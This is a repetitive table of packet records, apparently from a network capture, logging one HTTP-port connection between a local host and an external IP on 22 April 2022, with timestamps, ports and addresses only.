Apr 22, 2022 18:13:04.154927969 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.154942036 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.154953957 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.154968023 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155050039 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155101061 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155148983 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155165911 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155178070 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155204058 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155205965 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155220985 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155232906 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155240059 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155266047 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155380964 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155399084 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155410051 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155440092 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155459881 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155616999 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155636072 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155646086 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155673981 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155695915 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155699968 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155786037 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.155841112 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155872107 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.155883074 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.156006098 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.156058073 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.156090021 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.178720951 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.178812981 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.195175886 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195199013 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195213079 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195230007 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195280075 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.195338011 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.195791006 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195849895 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.195869923 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195882082 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195909023 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195921898 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.195925951 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195939064 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195960045 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.195981026 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.195988894 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.196001053 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196012020 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196023941 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.196028948 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196046114 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196054935 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.196058035 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196079969 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.196187973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196254015 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.196321011 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196337938 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196350098 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196376085 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.196398973 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.196492910 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.196541071 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.202294111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.202382088 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.236242056 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236265898 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236277103 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236294031 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236305952 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236340046 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.236371994 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.236582041 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236598969 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236610889 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236628056 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236640930 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.236689091 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.236704111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236716032 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236731052 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236766100 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.236773968 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236785889 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236798048 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236812115 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.236845970 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.236865044 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236877918 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.236882925 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.236917019 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.237006903 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.237076044 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.237095118 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.237107038 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.237107992 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.237153053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.237205029 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.237268925 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.260029078 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.260184050 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.276608944 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.276633978 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.276647091 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.276662111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.276906967 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.276932955 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.276998043 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.277004004 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277019024 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277030945 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277111053 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277123928 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277158022 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.277178049 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.277215958 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277232885 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277236938 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.277245045 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277312040 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.277436018 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277453899 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277466059 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277479887 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277498960 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277517080 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277527094 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277546883 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.277551889 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.277606010 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.277692080 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.283658981 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.283817053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.316185951 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.316205025 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.316215992 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.316232920 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.316246033 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.316399097 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.316962004 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.316981077 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.316993952 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317054987 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317060947 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.317073107 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317081928 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317143917 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317192078 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.317239046 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317251921 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317266941 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317267895 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.317285061 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317298889 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317368984 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317398071 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.317464113 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317481041 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317492962 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317506075 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.317545891 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317677021 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.341089964 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.341150045 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.356317997 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356352091 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356364012 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356381893 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356443882 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.356499910 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.356822014 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356841087 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356853008 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356870890 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.356875896 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356923103 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357080936 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357110023 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357122898 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357126951 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357137918 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357153893 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357165098 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357166052 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357192993 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357391119 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357409000 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357419968 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357435942 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357446909 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357506037 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357508898 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357511997 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357518911 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357549906 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357709885 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357729912 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357739925 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357760906 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357786894 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357871056 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357917070 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.407179117 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.430794001 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795639992 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795674086 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795690060 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795716047 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795741081 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795758009 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795792103 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.795862913 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795862913 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.795916080 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795923948 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.795934916 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795968056 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.795999050 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796025038 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796041012 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796082020 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.796171904 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796192884 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796228886 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.796242952 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836237907 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836298943 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836314917 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836338043 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836357117 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836363077 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836381912 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836390972 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836406946 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836424112 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836441994 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836447954 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836469889 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836472988 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836488008 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836505890 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836512089 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836536884 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836541891 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836553097 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836561918 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836577892 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836595058 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836601973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836617947 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836623907 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836659908 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836749077 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836783886 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836807013 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836837053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876041889 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876075983 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876092911 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876117945 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876135111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876321077 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876427889 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876496077 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876513004 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876523018 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876538038 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876563072 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876580000 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876596928 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876597881 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
